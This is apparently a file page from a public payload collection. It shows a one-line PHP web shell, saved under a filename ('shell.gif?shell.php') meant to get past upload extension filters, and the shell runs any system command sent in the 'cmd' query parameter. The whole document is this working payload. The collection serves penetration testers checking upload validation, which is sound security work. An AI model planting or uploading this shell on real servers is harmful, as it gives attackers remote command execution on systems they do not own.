PayloadsAllTheThings/Upload insecure files/Extension PHP/shell.gif?shell.php

1 line
44 B
PHP

<?php echo "Shell";system($_GET['cmd']); ?>